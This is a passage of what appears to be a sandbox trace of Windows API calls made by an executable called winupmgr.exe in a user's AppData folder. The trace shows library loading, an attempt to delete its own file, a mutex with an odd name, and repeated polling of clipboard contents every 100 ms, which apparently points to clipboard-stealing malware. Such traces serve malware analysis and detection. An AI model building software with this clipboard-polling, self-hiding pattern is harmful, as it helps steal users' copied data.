lpProcName="VariantInit") returned 0x76e43ed5 [0103.226] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SysFreeString") returned 0x76e43e59 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SysReAllocStringLen") returned 0x76e47810 [0103.227] GetProcAddress (hModule=0x76e40000, lpProcName="SysAllocStringLen") returned 0x76e445d2 [0103.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0103.227] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0103.227] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="SetClipboardData") returned 0x77188e57 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="OpenClipboard") returned 0x77158ecb [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="LoadIconA") returned 0x7714dafb [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColor") returned 0x77146c3c [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetOpenClipboardWindow") returned 0x7715c468 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="GetClipboardData") returned 0x77189f1d [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="EmptyClipboard") returned 0x771a7cb9 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CloseClipboard") returned 0x77158e8d [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0103.228] 
GetProcAddress (hModule=0x77130000, lpProcName="CharUpperBuffA") returned 0x7714fe47 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CharToOemA") returned 0x77154fee [0103.228] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardType") returned 0x77189ac4 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0103.228] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0103.229] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0103.229] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0103.229] GetKeyboardType (nTypeFlag=0) returned 4 [0103.229] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe\" " [0103.229] GetStartupInfoA (in: lpStartupInfo=0x18fef4 | out: lpStartupInfo=0x18fef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0103.229] GetVersion () returned 0x1db10106 [0103.229] GetVersion () returned 0x1db10106 [0103.229] GetCurrentThreadId () returned 0x7c4 [0103.229] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f0, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\winupmgr.exe")) returned 0x3a [0103.229] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8cb, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe")) returned 0x3a [0103.229] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0103.229] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0103.230] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0103.230] lstrcpynA (in: lpString1=0x18f8cb, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" [0103.230] GetThreadLocale () returned 0x409 [0103.230] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9db, cchData=5 | out: lpLCData="ENU") returned 4 [0103.233] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe") returned 58 [0103.233] lstrcpynA (in: lpString1=0x18f902, lpString2="ENU", iMaxLength=206 | out: lpString1="ENU") returned="ENU" [0103.233] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0103.233] lstrcpynA (in: lpString1=0x18f902, lpString2="EN", iMaxLength=206 | out: lpString1="EN") returned="EN" [0103.233] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0103.234] LoadStringA (in: 
hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0103.234] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6066e0 [0103.234] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1c80000 [0103.234] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6076e0 [0103.234] VirtualAlloc (lpAddress=0x1c80000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c80000 [0103.234] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffd7, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe4, 
lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb14, 
cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff2, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0103.235] GetVersionExA (in: lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x18ff44, dwMinorVersion=0x77cb1ecd, dwBuildNumber=0x10d9fa, dwPlatformId=0xfffffffe, szCSDVersion="vkÇw'\x0fÔv\x18\x03áv P`") | out: lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0103.236] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0103.236] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0103.236] GetThreadLocale () returned 0x409 [0103.236] GetThreadLocale () returned 0x409 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jan") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd70, cchData=256 
| out: lpLCData="January") returned 8 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Feb") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd70, cchData=256 | out: lpLCData="February") returned 9 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mar") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="March") returned 6 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Apr") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="April") returned 6 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jun") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="June") returned 5 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jul") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="July") returned 5 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Aug") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="August") returned 7 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sep") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd70, cchData=256 | out: 
lpLCData="September") returned 10 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Oct") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd70, cchData=256 | out: lpLCData="October") returned 8 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Nov") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd70, cchData=256 | out: lpLCData="November") returned 9 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Dec") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd70, cchData=256 | out: lpLCData="December") returned 9 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sun") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sunday") returned 7 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mon") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Monday") returned 7 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tue") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tuesday") returned 8 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wed") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wednesday") returned 10 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Thu") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd70, cchData=256 
| out: lpLCData="Thursday") returned 9 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Fri") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Friday") returned 7 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sat") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Saturday") returned 9 [0103.237] GetThreadLocale () returned 0x409 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="$") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec4, cchData=2 | out: lpLCData=".") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="2") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec4, cchData=2 | out: lpLCData="/") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0103.237] GetThreadLocale () returned 0x409 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | out: lpLCData="1") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0103.237] GetThreadLocale () returned 0x409 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | 
out: lpLCData="1") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec4, cchData=2 | out: lpLCData=":") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="AM") returned 3 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="PM") returned 3 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0103.238] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0103.238] GetProcAddress (hModule=0x76e40000, 
lpProcName="VarXor") returned 0x76ebee2e [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0103.239] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x94 [0103.239] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0103.239] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c [0103.239] GetDC (hWnd=0x0) returned 0x4010a8b [0103.240] GetDeviceCaps (hdc=0x4010a8b, index=90) returned 96 [0103.240] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0103.240] GetDC (hWnd=0x0) returned 0x4010a8b [0103.240] GetDeviceCaps (hdc=0x4010a8b, index=104) returned 0 [0103.240] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0103.240] CreatePalette (plpal=0x18fb28) returned 0x3a0809e5 [0103.240] GetStockObject (i=7) returned 0x1b00017 [0103.240] GetStockObject (i=5) returned 0x1900015 [0103.240] GetStockObject (i=13) returned 0x18a002e [0103.240] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0103.240] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) 
returned 11 [0103.240] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x2e [0103.240] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x1c80ba4, nSize=0x2e | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.240] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpFindFileData=0x18fde8 | out: lpFindFileData=0x18fde8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfbd4d440, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfbd4d440, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfb9e14a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xae00, dwReserved0=0x76c32e63, dwReserved1=0x2, cFileName="winupmgr.exe", cAlternateFileName="")) returned 0x605500 [0103.241] FindClose (in: hFindFile=0x605500 | out: hFindFile=0x605500) returned 1 [0103.241] FileTimeToLocalFileTime (in: lpFileTime=0x18fdfc, lpLocalFileTime=0x18ff28 | out: lpLocalFileTime=0x18ff28) returned 1 [0103.241] FileTimeToDosDateTime (in: lpFileTime=0x18ff28, lpFatDate=0x18ff32, lpFatTime=0x18ff30 | out: lpFatDate=0x18ff32, lpFatTime=0x18ff30) returned 1 [0103.241] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpFindFileData=0x18fde8 | out: lpFindFileData=0x18fde8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfbd4d440, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfbd4d440, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfb9e14a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xae00, dwReserved0=0x76c32e63, dwReserved1=0x2, cFileName="winupmgr.exe", cAlternateFileName="")) returned 0x605500 [0103.241] FindClose (in: hFindFile=0x605500 | out: hFindFile=0x605500) returned 1 [0103.241] FileTimeToLocalFileTime (in: lpFileTime=0x18fdfc, 
lpLocalFileTime=0x18ff28 | out: lpLocalFileTime=0x18ff28) returned 1 [0103.241] FileTimeToDosDateTime (in: lpFileTime=0x18ff28, lpFatDate=0x18ff32, lpFatTime=0x18ff30 | out: lpFatDate=0x18ff32, lpFatTime=0x18ff30) returned 1 [0103.241] DeleteFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe")) returned 0 [0103.242] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="^X@%E5~PB,23-A@M_B!P9O<>T/+=") returned 0xa0 [0103.242] GetLastError () returned 0x0 [0103.242] GetOpenClipboardWindow () returned 0x0 [0103.242] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.242] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.243] GlobalSize (hMem=0x605520) returned 0x21 [0103.243] GlobalLock (hMem=0x605520) returned 0x605520 [0103.243] GlobalUnlock (hMem=0x605520) returned 1 [0103.243] CloseClipboard () returned 1 [0103.243] Sleep (dwMilliseconds=0x64) [0103.435] GetOpenClipboardWindow () returned 0x0 [0103.435] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.435] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.436] GlobalSize (hMem=0x605520) returned 0x21 [0103.436] GlobalLock (hMem=0x605520) returned 0x605520 [0103.436] GlobalUnlock (hMem=0x605520) returned 1 [0103.436] CloseClipboard () returned 1 [0103.436] Sleep (dwMilliseconds=0x64) [0103.639] GetOpenClipboardWindow () returned 0x0 [0103.639] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.639] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.639] GlobalSize (hMem=0x605520) returned 0x21 [0103.639] GlobalLock (hMem=0x605520) returned 0x605520 [0103.639] GlobalUnlock (hMem=0x605520) returned 1 [0103.639] CloseClipboard () returned 1 [0103.639] Sleep (dwMilliseconds=0x64) [0103.919] GetOpenClipboardWindow () returned 0x0 [0103.919] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.919] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.920] GlobalSize (hMem=0x605520) returned 
